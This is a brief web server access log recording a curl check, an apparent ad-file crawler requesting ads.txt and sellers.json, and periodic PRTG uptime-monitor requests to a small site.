51.159.103.14 - - [01/Sep/2024:21:22:53 +0200] "HEAD / HTTP/1.1" 200 - "-" "curl/7.81.0"
51.159.103.14 - - [01/Sep/2024:21:22:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
51.159.103.14 - - [01/Sep/2024:21:22:56 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
51.159.103.14 - - [01/Sep/2024:21:22:57 +0200] "GET /ads.txt HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
51.159.103.14 - - [01/Sep/2024:21:22:57 +0200] "GET /app-ads.txt HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
51.159.103.14 - - [01/Sep/2024:21:22:57 +0200] "GET /sellers.json HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
212.91.246.72 - - [01/Sep/2024:21:23:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:24:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Sep/2024:21:24:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:21:25:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
